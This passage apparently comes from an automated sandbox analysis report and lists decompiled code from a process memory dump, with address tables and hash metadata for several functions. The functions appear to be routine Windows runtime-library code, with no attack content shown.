											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E014E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E014FFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1555350;
							if(_t109 != 0x1555350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E014FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E014F5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                    0x01462d8a
                    0x01462d8a
                    0x01462d92
                    0x01462d96
                    0x01462d9e
                    0x01462da0
                    0x01462da3
                    0x01462da5
                    0x01462da8
                    0x01462dab
                    0x01462db2
                    0x014bf9aa
                    0x014bf9ab
                    0x014bf9ae
                    0x014bf9ae
                    0x01462db8
                    0x01462dc2
                    0x014bf9b9
                    0x014bf9be
                    0x014bf9bf
                    0x014bf9bf
                    0x01462dcf
                    0x014bf9c9
                    0x01462dd5
                    0x01462dd5
                    0x01462dd5
                    0x01462dde
                    0x01462de1
                    0x01462e70
                    0x01462e72
                    0x01462e72
                    0x01462de7
                    0x01462deb
                    0x01462e7c
                    0x01462e83
                    0x01462e85
                    0x01462e8b
                    0x01462e8d
                    0x01462e92
                    0x01462e92
                    0x01462e85
                    0x01462df1
                    0x01462df7
                    0x01462df9
                    0x01462df9
                    0x01462dfc
                    0x01462dff
                    0x01462e02
                    0x00000000
                    0x01462e05
                    0x01462e0c
                    0x014bf9d9
                    0x01462e12
                    0x01462e12
                    0x01462e12
                    0x01462e1a
                    0x014bf9e3
                    0x014bf9e9
                    0x014bf9f0
                    0x014bf9f6
                    0x014bf9f8
                    0x014bf9f8
                    0x014bf9f0
                    0x01462e23
                    0x014bfa02
                    0x014bfa03
                    0x014bfa05
                    0x014bfa06
                    0x00000000
                    0x01462e29
                    0x01462e29
                    0x01462e2e
                    0x01462e34
                    0x01462e3e
                    0x00000000
                    0x00000000
                    0x01462e44
                    0x01462e47
                    0x01462e4d
                    0x00000000
                    0x00000000
                    0x01462e4f
                    0x01462e54
                    0x00000000
                    0x00000000
                    0x01462e5a
                    0x01462e5f
                    0x01462e9a
                    0x01462ea4
                    0x01462ea5
                    0x01462ea8
                    0x01462eaf
                    0x01462eb2
                    0x01462eb5
                    0x014bfae9
                    0x014bfaeb
                    0x014bfaed
                    0x014bfaef
                    0x014bfaf7
                    0x014bfaf8
                    0x014bfafd
                    0x014bfaff
                    0x014bfb04
                    0x014bfb04
                    0x014bfaff
                    0x01462ec0
                    0x01462ec4
                    0x01462ec6
                    0x01462ec8
                    0x014bfb14
                    0x014bfb18
                    0x014bfb1e
                    0x014bfb21
                    0x014bfb21
                    0x01462ece
                    0x01462ece
                    0x01462ece
                    0x01462ed7
                    0x01462e61
                    0x01462e63
                    0x014bfa6b
                    0x014bfa71
                    0x014bfa76
                    0x014bfa78
                    0x014bfa8a
                    0x014bfa7a
                    0x014bfa83
                    0x014bfa83
                    0x014bfa8f
                    0x014bfa91
                    0x014bfa97
                    0x014bfa9d
                    0x014bfaa4
                    0x014bfaaa
                    0x014bfaaf
                    0x014bfab1
                    0x014bfac3
                    0x014bfab3
                    0x014bfabc
                    0x014bfabc
                    0x014bfac8
                    0x014bfacb
                    0x014bfadf
                    0x014bfadf
                    0x014bfacb
                    0x014bfaa4
                    0x014bfa91
                    0x01462e6f
                    0x01462e6f
                    0x01462e5f
                    0x014bfa13
                    0x014bfa15
                    0x014bfa17
                    0x014bfa1f
                    0x014bfa21
                    0x014bfa22
                    0x014bfa25
                    0x014bfa28
                    0x014bfa2f
                    0x014bfa2f
                    0x014bfa2a
                    0x014bfa2a
                    0x014bfa2a
                    0x014bfa31
                    0x014bfa34
                    0x014bfa36
                    0x014bfa3c
                    0x014bfa3e
                    0x014bfa41
                    0x014bfa43
                    0x014bfa45
                    0x014bfa45
                    0x014bfa41
                    0x014bfa3c
                    0x014bfa4a
                    0x014bfa4f
                    0x014bfa51
                    0x014bfa53
                    0x014bfa56
                    0x014bfa5b
                    0x014bfa5e
                    0x00000000
                    0x014bfa5e
                    0x01462e23

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: RTL: Re-Waiting
                    • API String ID: 0-316354757
                    • Opcode ID: 94c6a58ed26303d6d3d28afe7c67856932cc6b655a6d14fe98375b930df20bbb
                    • Instruction ID: 2c563eafb627272191e45168f07fbdaa16c5d31be4476c9919642277bd8e885b
                    • Opcode Fuzzy Hash: 94c6a58ed26303d6d3d28afe7c67856932cc6b655a6d14fe98375b930df20bbb
                    • Instruction Fuzzy Hash: 9E614671A00605ABDB22DF6CCC90BBF7BE9EB54328F14066BD915973F1C770990687A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01530EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E01530EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0152FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01531074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E014A9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0152A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0152A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1558b04 >> 0x14) + (_v44 -  *0x1558b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01487D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0152138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01487D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0151FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1558724 & 0x00000008) != 0) {
						E015252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E015315B5(0x1558ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                    0x01530eb7
                    0x01530eb9
                    0x01530ec0
                    0x01530ec2
                    0x01530ecd
                    0x0153105b
                    0x0153105b
                    0x01531061
                    0x01531066
                    0x01531066
                    0x0153106b
                    0x01531073
                    0x01531073
                    0x01530ed3
                    0x01530ed6
                    0x01530edc
                    0x01530ee0
                    0x01530ee7
                    0x01530ef0
                    0x01530ef5
                    0x01530efa
                    0x01530efc
                    0x01530efd
                    0x01530f03
                    0x01530f04
                    0x01530f06
                    0x01530f07
                    0x01530f09
                    0x01530f0e
                    0x01530f14
                    0x01530f23
                    0x01530f2d
                    0x01530f34
                    0x01530f34
                    0x01530f14
                    0x01530f52
                    0x00000000
                    0x00000000
                    0x01530f58
                    0x01530f73
                    0x01530f74
                    0x01530f79
                    0x01530f7d
                    0x01530f80
                    0x01530f86
                    0x01530fab
                    0x01530fb5
                    0x01530fc6
                    0x01530fd1
                    0x01530fe3
                    0x01530fd3
                    0x01530fdc
                    0x01530fdc
                    0x01530feb
                    0x01531009
                    0x01531009
                    0x01531015
                    0x01531027
                    0x01531017
                    0x01531020
                    0x01531020
                    0x0153102f
                    0x0153103c
                    0x0153103c
                    0x01531048
                    0x01531050
                    0x01531050
                    0x01531055
                    0x00000000
                    0x01531055
                    0x01530f88
                    0x01530f9e
                    0x01530fa2
                    0x01530fa9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01530fa9
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 4e4d9ff950edd69c178b4fc072b671b15e855fb6c1f222bdb346ab1aa275d812
                    • Instruction ID: 4db57b108e9fe07f1f5b236856f4180133dcb587a912d10b6ae5267aff7049c8
                    • Opcode Fuzzy Hash: 4e4d9ff950edd69c178b4fc072b671b15e855fb6c1f222bdb346ab1aa275d812
                    • Instruction Fuzzy Hash: C4518E713047429FD325DF29D8C4B1BBBE5FBC4614F04092DFA969B290D671E805CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0149F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E0149F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01484120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E014A9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E014A9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E014A95D0();
							goto L11;
						} else {
							_t109 = L01484620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E014AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E014A95D0();
										L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                    0x0149f0d3
                    0x0149f0d9
                    0x0149f0e0
                    0x0149f0e7
                    0x0149f0f2
                    0x0149f0f4
                    0x0149f0f8
                    0x0149f100
                    0x0149f108
                    0x0149f10d
                    0x0149f115
                    0x0149f116
                    0x0149f11f
                    0x0149f123
                    0x0149f124
                    0x0149f12c
                    0x0149f130
                    0x0149f134
                    0x0149f13d
                    0x0149f144
                    0x0149f14b
                    0x0149f152
                    0x014dbab0
                    0x014dbab0
                    0x0149f158
                    0x0149f158
                    0x0149f15a
                    0x0149f160
                    0x0149f165
                    0x0149f166
                    0x0149f16f
                    0x0149f173
                    0x014dbaa7
                    0x014dbaa7
                    0x014dbaab
                    0x00000000
                    0x0149f179
                    0x0149f18d
                    0x0149f191
                    0x014dbaa2
                    0x00000000
                    0x0149f197
                    0x0149f19b
                    0x0149f1a2
                    0x0149f1a9
                    0x0149f1af
                    0x0149f1b2
                    0x0149f1b6
                    0x0149f1b9
                    0x0149f1c4
                    0x0149f1d8
                    0x0149f1df
                    0x0149f1e3
                    0x0149f1eb
                    0x0149f1ee
                    0x0149f1f4
                    0x0149f20f
                    0x014dbab7
                    0x014dbabb
                    0x014dbacc
                    0x014dbad1
                    0x0149f215
                    0x0149f218
                    0x0149f226
                    0x0149f22b
                    0x00000000
                    0x0149f22b
                    0x0149f1f6
                    0x0149f1f6
                    0x0149f1f9
                    0x0149f1fb
                    0x0149f1fb
                    0x0149f1f4
                    0x0149f191
                    0x0149f173
                    0x0149f152
                    0x0149f203

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction ID: 1d24200f52763dce45b0a11cfb85dbbb2c41d7c7985e61f8f7c28134f930a6ff
                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction Fuzzy Hash: B9518A71604711AFC320DF29C841A6BBBF8FF58714F01892EFA95976A0E7B4E904CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014E3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E014E3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x155d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E014A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E014E3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E014AFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E014E3540;
						E014AFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E014BDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E014F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E014A97C0();
					}
					return E014AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E014E3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E014E3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E014AFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E014A9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E014E3787(_a4,  &_v352, _t80);
						}
					}
					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E014A95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                    0x014e3552
                    0x014e355a
                    0x014e355d
                    0x014e3566
                    0x014e3567
                    0x014e357e
                    0x014e358f
                    0x014e35a1
                    0x014e35a5
                    0x014e366b
                    0x014e366b
                    0x014e366d
                    0x014e3672
                    0x014e3679
                    0x014e3685
                    0x014e368d
                    0x014e369d
                    0x014e36a7
                    0x014e36b8
                    0x014e36c6
                    0x014e36c7
                    0x014e36dc
                    0x014e36e1
                    0x014e36e7
                    0x014e36e9
                    0x014e36e9
                    0x014e3703
                    0x014e3703
                    0x014e35b5
                    0x014e35c0
                    0x014e35c4
                    0x00000000
                    0x00000000
                    0x014e35ca
                    0x014e35d7
                    0x014e35e2
                    0x014e35e6
                    0x014e35e8
                    0x014e35f5
                    0x014e35fa
                    0x014e3603
                    0x014e3604
                    0x014e3609
                    0x014e360a
                    0x014e3612
                    0x014e3613
                    0x014e361e
                    0x014e3622
                    0x014e3628
                    0x014e362f
                    0x014e362f
                    0x014e3636
                    0x014e3638
                    0x014e363b
                    0x014e3642
                    0x014e3642
                    0x014e3636
                    0x014e3657
                    0x014e3657
                    0x014e365c
                    0x014e3662
                    0x014e3669
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: BinaryHash
                    • API String ID: 0-2202222882
                    • Opcode ID: e2acda03801bfba42139c9636916db6eaf0157f4cba8817d2fa5d132a1c810d9
                    • Instruction ID: 77ba1fea1e1d588443ced3c4be67b61f4158ac5d52ccf71f11a11c19d04cf09f
                    • Opcode Fuzzy Hash: e2acda03801bfba42139c9636916db6eaf0157f4cba8817d2fa5d132a1c810d9
                    • Instruction Fuzzy Hash: 934167B1D0052D9BDB21DF61CC84FDEB77CAB54714F4145AAE609AB250DB309E88CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 015305AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E015305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E015307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E014A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0152A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0152A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01531293(_t79, _v40, E015307DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01487D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0152138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                    0x015305c5
                    0x015305ca
                    0x015305d3
                    0x015306db
                    0x015306db
                    0x015306dd
                    0x015306e3
                    0x015306e3
                    0x015305dd
                    0x015305e7
                    0x015305f6
                    0x01530600
                    0x01530607
                    0x01530610
                    0x01530615
                    0x0153061a
                    0x0153061c
                    0x0153061e
                    0x01530624
                    0x01530625
                    0x01530627
                    0x01530628
                    0x01530631
                    0x01530640
                    0x0153064d
                    0x01530654
                    0x01530654
                    0x01530631
                    0x0153066d
                    0x01530674
                    0x00000000
                    0x00000000
                    0x01530692
                    0x0153069e
                    0x015306b0
                    0x015306a0
                    0x015306a9
                    0x015306a9
                    0x015306b8
                    0x015306d6
                    0x015306d6
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction ID: d08e6aa297c3433f0e0a2be012dc84a3bf1a2abdc47b3fd6b33492e2faf556c5
                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction Fuzzy Hash: 2531F132204716ABE720DE29CC84F9B7BD9BBC4754F144229FA589F2C4D670E915CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014E3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E014E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E014A9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01484620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E014A9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                    0x014e3893
                    0x014e3896
                    0x014e3899
                    0x014e389f
                    0x014e38a0
                    0x014e38a4
                    0x014e38a9
                    0x014e38ac
                    0x014e38ad
                    0x014e38ae
                    0x014e38af
                    0x014e38b1
                    0x014e38b4
                    0x014e38bb
                    0x014e38bc
                    0x014e38bd
                    0x014e38c4
                    0x014e38c8
                    0x014e38ca
                    0x014e38ca
                    0x014e38d5
                    0x014e393e
                    0x014e3940
                    0x014e3942
                    0x014e3952
                    0x014e3954
                    0x014e3961
                    0x014e3961
                    0x014e3967
                    0x014e396e
                    0x014e396e
                    0x014e3947
                    0x014e394c
                    0x00000000
                    0x014e394c
                    0x014e38ea
                    0x014e38ee
                    0x014e38f8
                    0x014e38f9
                    0x014e38ff
                    0x014e3900
                    0x014e3902
                    0x014e3903
                    0x014e390b
                    0x014e390f
                    0x014e3950
                    0x00000000
                    0x014e3950
                    0x014e3915
                    0x014e391d
                    0x014e391d
                    0x014e3922
                    0x014e3926
                    0x00000000
                    0x014e3928
                    0x014e392b
                    0x014e392b
                    0x014e3935
                    0x014e3937
                    0x014e3937
                    0x00000000
                    0x014e3935
                    0x014e3926
                    0x014e38f0
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: BinaryName
                    • API String ID: 0-215506332
                    • Opcode ID: 382ea2167c85cb85558a33aa5d9f70abe10c061aefbabb4f8136f739b77c5462
                    • Instruction ID: 22c72f53df90d420611d81dc4cc465da7b3debc1064cf012ba0031ffb89ec200
                    • Opcode Fuzzy Hash: 382ea2167c85cb85558a33aa5d9f70abe10c061aefbabb4f8136f739b77c5462
                    • Instruction Fuzzy Hash: 2331C272D0151AAFEB16DE59C949E6FBBB4FB90B21F02416AE914A7360D7309E00C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0149D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                    Download Yara Rule
                    C-Code - Quality: 33%
                    			E0149D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x155d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01484120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E014AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E014A98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
